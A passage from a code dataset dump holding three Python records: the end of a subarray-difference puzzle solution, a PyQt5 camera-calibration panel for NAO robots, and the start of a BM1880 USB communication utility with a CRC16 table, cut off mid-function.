* The sub-arrays should not overlap.\n\neg- [2 -1 -2 1 -4 2 8] ans - (-1 -2 1 -4) (2 8), diff = 16 \n\"\"\"\ndef max_diff(l):\n def find_max_or_min(l, find_max):\n m = 0\n ex = l[0]\n for i in range(1,len(l)):\n if find_max:\n if l[i] > ex:\n m = i\n ex = l[i]\n else:\n if l[i] < ex:\n m = i\n ex = l[i]\n return m \n # Cumulative sum\n def csum(l):\n cumsum = []\n s = 0\n for i in l:\n s += i\n cumsum.append(s)\n return cumsum\n def find_two_extremes(cumsum):\n max_i = find_max_or_min(cumsum, True)\n min_i = find_max_or_min(cumsum, False)\n return sorted((min_i, max_i))\n\n # Main routine goes here\n cs = csum(l)\n (i, j) = find_two_extremes(cs)\n if j == len(l) -1:\n (i2, j2) = find_two_extremes(cs[:i+1])\n return (i2, i)\n elif i == 0:\n (i2, j2) = find_two_extremes(cs[j:])\n return (j, j + j2)\n else:\n return (i, j)\n","sub_path":"google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"425792766","text":"from mate.debug.colorlog import ColorLog\nfrom mate.lib.calibration.nao_calib_captures import *\nfrom mate.lib.calibration.calib_motion_generator import CalibMotionGenerator\nfrom mate.lib.calibration.calibration import BoardProperties as BoardProps, Transforms\nimport copy\nimport uuid\nimport json\nimport os\nimport time\nimport typing\nfrom typing import Union\nfrom datetime import datetime\nfrom enum import Enum, IntEnum\n\nimport math\nimport numpy as np\n\nfrom transforms3d import axangles as axangles, affines as affines\n\nimport PyQt5.QtGui as qtg\nimport PyQt5.QtCore as qtc\nimport PyQt5.QtWidgets as qtw\n\nimport mate.ui.utils as ui_utils\nfrom mate.ui.panels._panel import _Panel\n\nimport mate.net.nao as nao\nimport mate.net.nao_data as nd\nimport mate.net.utils as netutils\n\nfrom mate.lib.calibration.nao_cam_props import NaoCamProps as n_cam\nfrom mate.lib.calibration.nao_calib_captures import\\\n NaoCaptureData as n_cap,\\\n NaoKinematicMatrixCapture as n_kinCap,\\\n ImageWithKinematicData\nfrom mate.lib.calibration.nao_calibration import\\\n NaoCalibSettings,\\\n NaoCalibration as NaoCalib,\\\n NaoCalibrationResult as n_result\n\n\nlogger = ColorLog()\n\n\nclass Main(_Panel):\n name = \"CameraCalib\"\n\n CAM_MOUNT = {\n n_cam.TOP: \"Brain.CameraCalibration.top_image\",\n n_cam.BOTTOM: \"Brain.CameraCalibration.bottom_image\"\n }\n\n KIN_MATRIX_MOUNT = \"Brain.CameraCalibration.MatrixAndImageInfos\"\n\n CALIB_VISION_CFG = {\"mount\": \"Brain.CameraCalibration\",\n \"trigger_key\": \"calibrationCaptureTrigger\"}\n CALIB_BEHAVIOR_CFG = {\n \"mount\": \"Brain.BehaviorModule\",\n \"head_pitch_key\": \"calibrationHeadPitch\",\n \"head_yaw_key\": \"calibrationHeadYaw\",\n \"is_cam_calib\": \"isCameraCalibration\"\n }\n\n update_config_signal = qtc.pyqtSignal(nd.ConfigMount)\n\n def __init__(self, main_window, nao: nao.Nao, model: typing.Dict = None):\n super(Main, self).__init__(main_window, self.name, nao)\n ui_utils.loadUi(__file__, self)\n self.model = model\n self.currentSubscriptions = set()\n self.configWidget.hide()\n self.resultWidget.hide()\n self.btnCapture.clicked.connect(self.capture)\n self.btnCalibrate.clicked.connect(self.startCalib)\n self.btnSave.clicked.connect(self.saveCalib)\n self.btnExport.clicked.connect(self.exportCalibToFile)\n self.btnShowResults.clicked.connect(\n lambda: self.resultWidget.setVisible(not self.resultWidget.isVisible()))\n self.btnConfAndManualMode.clicked.connect(\n lambda: self.configWidget.setVisible(not 
self.configWidget.isVisible()))\n self.checkBoxCalibModeEnable.stateChanged.connect(\n lambda: self.setCalib(self.checkBoxCalibModeEnable.isChecked()))\n self.btnManualMove.clicked.connect(lambda: self.moveRobot(\n float(self.txtPitch.text().strip()), float(self.txtYaw.text().strip())))\n\n # As capturing automatically project, no need to specifically call project\n self.btnProjectMarkers.clicked.connect(self.capture)\n\n self.btnPlayMotionSeq.clicked.connect(\n lambda: self.setMotionSequenceState(1))\n self.btnStopMotion.clicked.connect(\n lambda: self.setMotionSequenceState(0))\n\n self.btnDownload.clicked.connect(\n self.saveCapturesToFile)\n\n #### Set UI update ####\n self.frame_rate = 20\n self.updateInterval = 1.0/float(self.frame_rate)\n\n self.timer = qtc.QTimer()\n self.timer.timeout.connect(self.update)\n self.set_timer(self.frame_rate)\n\n # Motion command things.\n\n # The UI update timer itself will be used for timing the capture stuff.\n # motion command sending; values in seconds\n self.motionDelay = 2.0\n # wait n seconds after motion command is sent before triggering\n self.captureDelay = 2.3\n self.motionCommandList = CalibMotionGenerator.generateHeadMotion()\n self.motionSeqIndex = 0\n self.motionSeqState = 0\n self.elapsedTime = 0\n\n self.trigger_state = {n_cam.TOP: False, n_cam.BOTTOM: False}\n\n #### capture ####\n self.captureFlag = False\n # self.captureInfo = CalgetGroundToCamera\n\n #### store data of each capture. ####\n self.captures = []\n\n #### img data ####\n self.cur_cam_img_data = {\n n_cam.TOP:\n ImageWithKinematicData(n_cam.TOP,\n Main.CAM_MOUNT[n_cam.TOP], 0, 0, [], False),\n n_cam.BOTTOM: ImageWithKinematicData(n_cam.BOTTOM,\n Main.CAM_MOUNT[n_cam.BOTTOM], 0, 0, [], False)\n }\n\n self.cur_matrix_cap = {\n n_cam.TOP: n_kinCap(n_cam.TOP),\n n_cam.BOTTOM: n_kinCap(n_cam.BOTTOM)\n }\n\n # rotation pose for the RC17 rig (using charuco): [math.pi/2,0,-math.pi/2]\n # translation for the RC17 rig: 395 in x;\n self.calib_board = BoardProps(35, 50, 6, 11, BoardProps.PatternType.CHARUCO_BOARD, [\n math.pi/2, 0, -math.pi/2], [400, 150, 15])\n self.calibrator = NaoCalib(NaoCalibSettings(\n [self.calib_board], self.checkBoxIntrinsicTop.isChecked(), self.checkBoxIntrinsicBottom.isChecked(\n ), self.checkBoxExtrinsicTop.isChecked(), self.checkBoxExtrinsicBottom.isChecked()))\n\n self.btnClearCaptures.clicked.connect(\n self.clearCaptureBtnHandler)\n self.results = None\n self.enableDisableCalibButton()\n #### connect update config signal ####\n self.currentConfig = None\n self.update_config_signal.connect(self.updateConfig)\n\n #### connect ####\n if self.nao.is_connected():\n self.connect(self.nao, self.frame_rate)\n\n def clearCaptureBtnHandler(self):\n self.calibrator.clearCapturedData()\n self.enableDisableCalibButton()\n self.updateStatusLabel(\"Captures cleared\")\n\n def enableDisableCalibButton(self):\n c = self.calibrator.captureCount()\n b = c[NaoCamProps.TOP] or c[NaoCamProps.BOTTOM]\n self.btnCalibrate.setEnabled(b)\n self.btnClearCaptures.setEnabled(b)\n self.btnDownload.setEnabled(b)\n\n def updateConfig(self, data: nd.ConfigMount):\n if data.key == n_result.MOUNT:\n self.currentConfig = copy.deepcopy(data.data)\n self.calibrator.updateConfiguration(self.currentConfig)\n logger.info(__name__ + \"Updated config\")\n\n #### Subscriptions, connections, etc ####\n def connect(self, nao: nao.Nao, frame_rate: int = 30):\n self.nao = nao\n self.set_timer(frame_rate)\n\n #### subscribe ####\n self.subscribeMulti(Main.CAM_MOUNT.values())\n 
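# ---------------------------------------------------------------------------
# Illustrative sketch (hypothetical standalone form): the subscription
# bookkeeping that subscribe/subscribeMulti/unsubscribeMulti below implement.
# A set of mount keys prevents double-subscribing, and teardown walks the
# tracked keys rather than guessing what was registered.
class SubscriptionBook:
    def __init__(self, protocol, owner_id):
        self.protocol = protocol
        self.owner_id = owner_id
        self.keys = set()

    def subscribe(self, key, callback):
        if key not in self.keys:
            self.protocol.subscribe(key, self.owner_id, callback)
            self.keys.add(key)

    def unsubscribe_all(self):
        for key in self.keys:
            self.protocol.unsubscribe(key, self.owner_id)
        self.keys.clear()
# ---------------------------------------------------------------------------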
self.subscribe(Main.KIN_MATRIX_MOUNT)\n self.subscribeConfig(n_result.MOUNT)\n\n self.trigger(n_cam.CamSelect.NONE)\n\n def set_timer(self, frameRate: int):\n self.timer.stop()\n if frameRate > 0 and self.nao.is_connected():\n self.updateInterval = 1.0/self.frame_rate\n self.timer.start(1000 * self.updateInterval)\n\n def subscribe(self, key):\n if self.nao.is_connected() and key not in self.currentSubscriptions:\n self.nao.debug_protocol.subscribe(key, self.identifier,\n lambda d: self.data_received(d))\n self.currentSubscriptions.add(key)\n\n def unsubscribe(self, key: str = \"*\"):\n self.unsubscribeMulti(key)\n\n def unsubscribeMulti(self, keys: Union[str, list, set]):\n '''\n Unsubscribe from multiple mounts\n sending wildcard \"*\" instead of a list will cause unsubscription from all\n '''\n if self.nao.is_connected():\n if isinstance(keys, str) and keys == \"*\":\n for curSubKey in self.currentSubscriptions:\n self.nao.debug_protocol.unsubscribe(curSubKey,\n self.identifier)\n else:\n # Only attempt to unsub. already subscribed keys\n keys = set(keys)\n keys.intersection_update(self.currentSubscriptions)\n for curSubKey in keys:\n self.nao.debug_protocol.unsubscribe(curSubKey,\n self.identifier)\n\n def subscribeMulti(self, keys):\n '''\n Subscribe for multiple mounts\n '''\n keys = set(keys)\n if self.nao.is_connected():\n for key in keys:\n self.nao.debug_protocol.subscribe(key, self.identifier,\n lambda d: self.data_received(d))\n self.currentSubscriptions.update(keys)\n\n def drawMarkers(self, pixmap, dataList, colour: qtg.QColor = qtc.Qt.red):\n if not (dataList and len(dataList[0]) == 2):\n if dataList[0]:\n logger.error(__name__ + \": drawMarkers-> Data list is not in correct shape;\" +\n str(len(dataList), len(dataList[0])))\n return\n\n painter = qtg.QPainter()\n painter.begin(pixmap)\n painter.setPen(colour)\n\n rect = qtc.QRectF(0, 0, 4, 4)\n for dataSet in dataList:\n proj_pt = (dataSet[1][0], dataSet[1][1])\n rect = qtc.QRectF(qtc.QPointF(\n proj_pt[0], proj_pt[1]), qtc.QSizeF(4, 4))\n painter.drawText(qtc.QPointF(\n proj_pt[0]+5, proj_pt[1]+5), str(dataSet[0]))\n painter.fillRect(rect, colour)\n painter.end()\n\n def saveCapturesToFile(self):\n options = qtw.QFileDialog.Options()\n options |= qtw.QFileDialog.DontUseNativeDialog\n fileName, _ = qtw.QFileDialog.getSaveFileName(\n self, \"QFileDialog.getSaveFileName()\", \"\", \"All Files (*);;JSON Files (*.json)\", options=options)\n if fileName:\n self.calibrator.captureDataToJsonFile(fileName)\n\n def setMotionSequenceState(self, val=0):\n if val > 0:\n self.motionSeqState = val\n if (not self.btnStopMotion.isEnabled()) or self.btnPlayMotionSeq.isEnabled():\n self.btnStopMotion.setEnabled(True)\n self.btnPlayMotionSeq.setEnabled(False)\n else:\n self.motionSeqState = 0\n self.motionSeqIndex = 0\n self.elapsedTime = 0\n if self.btnStopMotion.isEnabled() or (not self.btnPlayMotionSeq.isEnabled()):\n self.btnStopMotion.setEnabled(False)\n self.btnPlayMotionSeq.setEnabled(True)\n\n def setCalib(self, val: bool = False):\n self.setConfig(\n Main.CALIB_BEHAVIOR_CFG[\"mount\"], Main.CALIB_BEHAVIOR_CFG[\"is_cam_calib\"], bool(val))\n\n def moveRobot(self, pitch: float, yaw: float, torso_rotV: list = [], torso_posV: list = []):\n self.setConfig(\n Main.CALIB_BEHAVIOR_CFG[\"mount\"], \"useEffectiveYawVelocity\", False)\n self.setConfig(\n Main.CALIB_BEHAVIOR_CFG[\"mount\"], Main.CALIB_BEHAVIOR_CFG[\"head_yaw_key\"], yaw)\n self.setConfig(\n Main.CALIB_BEHAVIOR_CFG[\"mount\"], Main.CALIB_BEHAVIOR_CFG[\"head_pitch_key\"], 
pitch)\n\n # TODO FUTURE set torso movements\n\n def trigger(self, val: n_cam.CamSelect = n_cam.CamSelect.BOTH):\n if val == n_cam.CamSelect.BOTH:\n self.trigger_state[n_cam.TOP] = True\n self.trigger_state[n_cam.BOTTOM] = True\n elif val == n_cam.CamSelect.TOP:\n self.trigger_state[n_cam.TOP] = True\n self.trigger_state[n_cam.BOTTOM] = False\n elif val == n_cam.CamSelect.BOTTOM:\n self.trigger_state[n_cam.TOP] = False\n self.trigger_state[n_cam.BOTTOM] = True\n else:\n self.trigger_state[n_cam.TOP] = False\n self.trigger_state[n_cam.BOTTOM] = False\n\n def capture(self):\n '''\n Take a snapshot.\n 1. Image\n 2. Kinematic Matrices\n torso2gnd\n head2torso\n cam2gnd\n 3. FUTURE - Joint angles\n '''\n self.captureFlag = True\n\n # rising edge\n self.trigger(n_cam.CamSelect.BOTH)\n\n def startCalib(self):\n if not self.currentConfig:\n msg = qtw.QMessageBox()\n msg.setIcon(qtw.QMessageBox.Warning)\n msg.setText(\n \"Existing Projection config is not sent from NAO yet. Want to proceed?\")\n msg.setWindowTitle(\"Config Not set\")\n msg.setStandardButtons(qtw.QMessageBox.Yes | qtw.QMessageBox.No)\n msg.setDefaultButton(qtw.QMessageBox.No)\n msg.setEscapeButton(qtw.QMessageBox.No)\n\n if msg.exec_() == qtw.QMessageBox.No:\n self.updateStatusLabel(\"Calibration Cancelled\")\n return\n\n self.calibrator.updateConfiguration(self.currentConfig)\n enableSaveAndExport = False\n\n self.btnCalibrate.setEnabled(False)\n self.resultWidget.hide()\n self.btnShowResults.setEnabled(False)\n\n self.checkSaveTopInt.setChecked(False)\n self.checkSaveTopExt.setChecked(False)\n self.checkSaveBotInt.setChecked(False)\n self.checkSaveBotExt.setChecked(False)\n\n self.checkSaveTopInt.setEnabled(False)\n self.checkSaveTopExt.setEnabled(False)\n self.checkSaveBotInt.setEnabled(False)\n self.checkSaveBotExt.setEnabled(False)\n self.btnSave.setEnabled(enableSaveAndExport)\n self.btnExport.setEnabled(enableSaveAndExport)\n\n self.calibrator.settings.setFlags(self.checkBoxIntrinsicTop.isChecked(), self.checkBoxIntrinsicBottom.isChecked(\n ), self.checkBoxExtrinsicTop.isChecked(), self.checkBoxExtrinsicBottom.isChecked())\n\n output = self.calibrator.startCalibration()\n if output:\n prettyOut = {}\n if output.is_ext_done[n_cam.TOP]:\n self.checkSaveTopExt.setEnabled(True)\n enableSaveAndExport = True\n prettyOut[n_result.TOP_EXT] = output.results[n_result.TOP_EXT]\n if output.is_ext_done[n_cam.BOTTOM]:\n self.checkSaveBotExt.setEnabled(True)\n enableSaveAndExport = True\n prettyOut[n_result.BOTTOM_EXT] = output.results[n_result.BOTTOM_EXT]\n if output.is_int_done[n_cam.TOP]:\n self.checkSaveTopInt.setEnabled(True)\n enableSaveAndExport = True\n prettyOut[n_result.TOP_FC] = output.results[n_result.TOP_FC]\n prettyOut[n_result.TOP_CC] = output.results[n_result.TOP_CC]\n if output.is_int_done[n_cam.BOTTOM]:\n self.checkSaveBotInt.setEnabled(True)\n enableSaveAndExport = True\n prettyOut[n_result.BOTTOM_FC] = output.results[n_result.BOTTOM_FC]\n prettyOut[n_result.BOTTOM_CC] = output.results[n_result.BOTTOM_CC]\n\n self.results = output\n self.btnShowResults.setEnabled(True)\n self.btnSave.setEnabled(enableSaveAndExport)\n self.btnExport.setEnabled(enableSaveAndExport) \n self.txtResult.setPlainText(json.dumps(prettyOut, indent=2))\n self.updateStatusLabel(\"Calibration Complete\")\n else:\n self.updateStatusLabel(\"Calibration Failed\")\n\n self.btnCalibrate.setEnabled(True)\n\n def saveCalib(self):\n data = self.exportCalib()\n\n for key, value in data.items():\n self.setConfig(n_result.MOUNT, key, value)\n\n 
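# ---------------------------------------------------------------------------
# Illustrative sketch: the if/elif ladder in trigger() above reduces to a
# lookup table from CamSelect to a (top, bottom) flag pair; unknown values
# fall back to (False, False), matching the final else branch. Hypothetical
# rewrite, not wired into the class.
_TRIGGER_FLAGS = {
    n_cam.CamSelect.BOTH:   (True, True),
    n_cam.CamSelect.TOP:    (True, False),
    n_cam.CamSelect.BOTTOM: (False, True),
}

def trigger_via_table(self, val=n_cam.CamSelect.BOTH):
    top, bottom = _TRIGGER_FLAGS.get(val, (False, False))
    self.trigger_state[n_cam.TOP] = top
    self.trigger_state[n_cam.BOTTOM] = bottom
# ---------------------------------------------------------------------------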
self.saveConfig()\n self.updateStatusLabel(\"Saved Results\")\n\n def exportCalib(self):\n output = self.results\n data = {}\n if output:\n if output.is_ext_done[n_cam.TOP] and self.checkSaveTopExt.isChecked():\n data[n_result.TOP_EXT] = output.results[n_result.TOP_EXT]\n if output.is_ext_done[n_cam.BOTTOM] and self.checkSaveBotExt.isChecked():\n data[n_result.BOTTOM_EXT] = output.results[n_result.BOTTOM_EXT]\n if output.is_int_done[n_cam.TOP] and self.checkSaveTopInt.isChecked():\n data[n_result.TOP_FC] = output.results[n_result.TOP_FC]\n data[n_result.TOP_CC] = output.results[n_result.TOP_CC]\n if output.is_int_done[n_cam.BOTTOM] and self.checkSaveBotInt.isChecked():\n data[n_result.BOTTOM_FC] = output.results[n_result.BOTTOM_FC]\n data[n_result.BOTTOM_CC] = output.results[n_result.BOTTOM_CC]\n return data\n\n def exportCalibToFile(self):\n data = self.exportCalib()\n currentConfig = copy.deepcopy(self.currentConfig)\n currentConfig.update(data)\n\n if currentConfig is None:\n return\n\n location = qtw.QFileDialog.getSaveFileName(\n self, \"Save file\",\n os.getcwd() + \"/../../etc/configuration/location/default/head/\" +\n n_result.MOUNT + \".json\")\n\n if location[0] == '':\n return\n\n try:\n with open(location[0], 'w') as f:\n json.dump(currentConfig, f, indent=4)\n f.write(\"\\n\")\n except Exception as e:\n logger.error(__name__ +\n \": Exception while saving config to file: \" +\n str(e))\n self.window().statusBar().showMessage(str(e))\n\n def updateStatusLabel(self, string: str):\n self.lblStatus.setText(string)\n\n def data_received(self, data: netutils.Data):\n if isinstance(data, nd.DebugValue):\n if data.key == Main.KIN_MATRIX_MOUNT:\n mat = data.data\n timestamp = data.timestamp\n\n # get camera from idenficiation string\n camera = list(n_cam.CAM_ENUM_TO_STR_MAP.keys())[list(n_cam.CAM_ENUM_TO_STR_MAP.values())\n .index(mat[\"imageInfos\"][\"identification\"])]\n\n torso_to_head = ImageWithKinematicData.naoDebugKinMatrixToAffine(mat[n_kinCap.getDataKeyString(\n n_kinCap.DataKey.TORSO_TO_HEAD)])\n ground_to_torso = ImageWithKinematicData.naoDebugKinMatrixToAffine(mat[n_kinCap.getDataKeyString(\n n_kinCap.DataKey.GROUND_TO_TORSO)])\n ground_to_cam = ImageWithKinematicData.naoDebugKinMatrixToAffine(\n mat[\"imageInfos\"][n_kinCap.getDataKeyString(n_kinCap.DataKey.GROUND_TO_CAM)])\n ground_to_cam[0:3, 3] *= 1000 # convert to mm\n\n curMatCap = self.cur_matrix_cap[camera]\n curMatCap.setValues(\n camera, timestamp, torso_to_head, ground_to_torso, ground_to_cam)\n self.cur_matrix_cap[camera] = curMatCap\n\n # print(\"l1T\", mat[\"ImageInfos\"][\"timestamp\"])\n if timestamp == self.cur_cam_img_data[camera].timestamp:\n logger.info(__name__ + \": Sync mat \" + str(camera))\n self.cur_cam_img_data[camera].kinematic_chain = copy.deepcopy(\n curMatCap)\n self.cur_cam_img_data[camera].is_kinematics_updated = True\n self.cur_cam_img_data[camera].isSynced = True\n\n else:\n logger.warning(\n __name__ + \": Unused debug value key: \" + data.key)\n\n if isinstance(data, nd.DebugImage):\n for camera in n_cam.CAMERAS:\n if data.key == Main.CAM_MOUNT[camera] and self.trigger_state[camera]:\n self.trigger_state[camera] = False\n self.cur_cam_img_data[camera].reset(data)\n if self.cur_matrix_cap[camera].timestamp == data.timestamp:\n self.cur_cam_img_data[camera].kinematic_chain = copy.deepcopy(\n self.cur_matrix_cap[camera])\n self.cur_cam_img_data[camera].is_kinematics_updated = True\n self.cur_cam_img_data[camera].isSynced = True\n logger.info(__name__ + \": Sync Img \" + str(camera))\n\n 
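# ---------------------------------------------------------------------------
# Illustrative sketch: the pairing rule data_received above applies from both
# directions, in one place. An image capture and a kinematic-matrix capture
# are combined only when their timestamps match exactly; otherwise each side
# is held until its peer arrives. Hypothetical helper, not used by the class.
def try_sync(img_cap, mat_cap):
    if img_cap.timestamp != mat_cap.timestamp:
        return False
    img_cap.kinematic_chain = copy.deepcopy(mat_cap)
    img_cap.is_kinematics_updated = True
    img_cap.isSynced = True
    return True
# ---------------------------------------------------------------------------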
def update(self):\n '''\n Update UI and update capture array if new data is there.\n '''\n # Motion sequence playing\n\n if self.motionSeqState:\n if self.motionSeqState == 1:\n self.trigger(n_cam.CamSelect.BOTH)\n self.setMotionSequenceState(2)\n self.elapsedTime = 0\n\n elif self.motionSeqState == 2 and self.elapsedTime > self.motionDelay:\n # We got the images, now the next movement\n if self.motionSeqIndex < len(self.motionCommandList):\n idx = self.motionSeqIndex\n command = self.motionCommandList[idx]\n self.moveRobot(command['pitch'], command['yaw'])\n self.setMotionSequenceState(3)\n self.motionSeqIndex += 1\n else:\n self.setMotionSequenceState(0)\n self.updateStatusLabel(\"Capture Sequence Done\")\n\n elif self.motionSeqState == 3 and \\\n self.elapsedTime > (self.motionDelay + self.captureDelay):\n # Movement should be done by now, start the next cycle\n self.setMotionSequenceState(1)\n self.trigger(n_cam.CamSelect.NONE)\n\n self.elapsedTime += self.updateInterval\n\n # Image updates\n\n # Due to preprocessing times, the timer has to be stopped until processing is done.\n # The idea is similar to stopping interrupts in an interrupt routine.\n isStopTimer = False\n\n for camera in n_cam.CAMERAS:\n curImgData = self.cur_cam_img_data[camera]\n if curImgData.is_img_dat_updated:\n # startTime = time.perf_counter()\n\n pixmap = qtg.QPixmap()\n curImgData.loadToPixMap(pixmap)\n\n if curImgData.is_kinematics_updated:\n # stop timer\n if not isStopTimer:\n self.timer.stop()\n isStopTimer = True\n\n # Process and get calib feature points\n count = self.calibrator.processCapture(\n curImgData.getNaoCapData(), curImgData.data)\n # Update UI labels and update button states\n self.enableDisableCalibButton()\n self.updateStatusLabel(\n \"Snapshots captured top: \"+str(count[0])+\", bottom: \"+str(count[1]))\n\n if self.calibrator.capture_data[camera]:\n\n cap_data = self.calibrator.capture_data[camera][-1]\n projectedBoardPoints = self.calibrator.projectBoardPoints(\n cap_data, self.calibrator.camerasProperties[camera])\n\n self.drawMarkers(\n pixmap, projectedBoardPoints, qtc.Qt.yellow)\n\n if self.results and self.results.is_ext_done[camera]:\n projectedBoardPoints = self.calibrator.projectBoardPoints(\n cap_data, self.calibrator.camerasProperties[camera], self.results.getExt(camera))\n self.drawMarkers(\n pixmap, projectedBoardPoints, qtc.Qt.green)\n\n if camera == n_cam.TOP:\n self.canvasTopCam.setMinimumSize(1, 1)\n self.canvasTopCam.setPixmap(\n pixmap.scaled(self.canvasTopCam.width(), self.canvasTopCam.height(), qtc.Qt.KeepAspectRatio))\n elif camera == n_cam.BOTTOM:\n self.canvasBottomCam.setMinimumSize(1, 1)\n self.canvasBottomCam.setPixmap(\n pixmap.scaled(self.canvasBottomCam.width(),\n self.canvasBottomCam.height(), qtc.Qt.KeepAspectRatio))\n if isStopTimer:\n self.timer.start(self.frame_rate)\n\n #### Config related ####\n\n def saveConfig(self):\n if self.nao.is_connected():\n self.nao.config_protocol.save()\n\n def setConfig(self, mount: str, key: str, value: str):\n if self.nao.is_connected():\n self.nao.config_protocol.set(mount, key, value)\n\n def subscribeConfig(self, key: str, force=False):\n if self.nao.is_connected():\n self.nao.config_protocol.subscribe(\n key,\n self.objectName(),\n lambda d: self.update_config_signal.emit(d))\n\n #### Other events ####\n def closeEvent(self, event):\n if self.nao.is_connected():\n self.trigger(n_cam.CamSelect.BOTH)\n self.setCalib(False)\n self.unsubscribe()\n self.timer.stop()\n self.deleteLater()\n super(Main, 
self).closeEvent(event)\n","sub_path":"tools/mate/mate/ui/panels/camera_calib/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":24870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"141043141","text":"#!/usr/local/bin/python\nfrom array import array\nimport bm_usb_util.bm_usb_pkt as pkt\nimport os\nimport platform\nimport re\nimport sys\nimport time\nimport usb.core\nimport usb.util\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\nclass bm_usb_libusb:\n # Table of CRC constants - implements x^16+x^12+x^5+1\n crc16_tab = [\n 0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,\n 0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,\n 0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,\n 0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,\n 0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,\n 0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,\n 0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,\n 0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,\n 0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,\n 0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,\n 0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,\n 0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,\n 0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,\n 0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,\n 0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,\n 0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,\n 0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,\n 0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,\n 0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,\n 0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,\n 0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,\n 0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,\n 0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,\n 0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,\n 0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,\n 0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,\n 0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,\n 0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,\n 0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,\n 0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,\n 0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,\n 0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0,\n ]\n\n def crc16_ccitt(self, HexData):\n cksum = int(\"0\", 16)\n for i in range(len(HexData)):\n cksum = self.crc16_tab[((cksum >> 8) ^ HexData[i]) & 0xff] ^ ((cksum << 8) & 0xff00)\n return cksum\n\n def close_device(self):\n progress_symbol = ['---', ' \\\\', ' \\\\', ' |', ' |', ' |', ' |', ' /', ' /']\n Found = -1\n i = 0\n while Found == -1:\n i = i + 1\n sys.stdout.write(\"Waiting for re-connect: %s \\r\" % (progress_symbol[i%len(progress_symbol)]))\n sys.stdout.flush()\n if self.device is not None:\n try:\n active = self.device.is_kernel_driver_active(1)\n if active is False:\n try:\n self.device.attach_kernel_driver(1)\n print(\"attach kernel driver\\n\")\n return\n except usb.USBError as e:\n time.sleep(0.05)\n continue\n else:\n break\n except usb.USBError as e:\n if '[Errno 19]' 
in str(e):\n # device is no longer connected\n return\n else:\n print(\"get acitve err %s\\n\" %(e))\n time.sleep(0.05)\n continue \n else:\n print(\"close a non-open device. \\n\")\n break\n\n def get_vid(self, vid_pid):\n vid = vid_pid.replace('VID:PID=', \"\")\n vid = vid.split(':', 1)[0]\n return int(vid, 16)\n\n def get_pid(self, vid_pid):\n pid = vid_pid.replace('VID:PID=', \"\")\n pid = pid.split(':', 1)[1]\n return int(pid, 16)\n\n def libusb_query(self, vid_pid_list, timeout=0, location=None):\n if location is not None:\n self.location = location\n progress_symbol = ['---', ' \\\\', ' \\\\', ' |', ' |', ' |', ' |', ' /', ' /']\n found = -1\n self.device = None\n i = 0\n query_time = time.time()\n while(found == -1):\n i = i + 1\n sys.stdout.write(\"Waiting for BM1880 USB port: %s \\r\" % (progress_symbol[i%len(progress_symbol)]))\n sys.stdout.flush()\n t_bus = None\n t_port_numbers = None\n if self.location is not None:\n t_bus = int(self.location.split('-')[0])\n t_port_numbers = self.location.split('-')[-1].split('.')\n t_port_numbers = tuple([int(j) for j in t_port_numbers])\n for vid_pid in vid_pid_list:\n if self.location is not None:\n self.device = 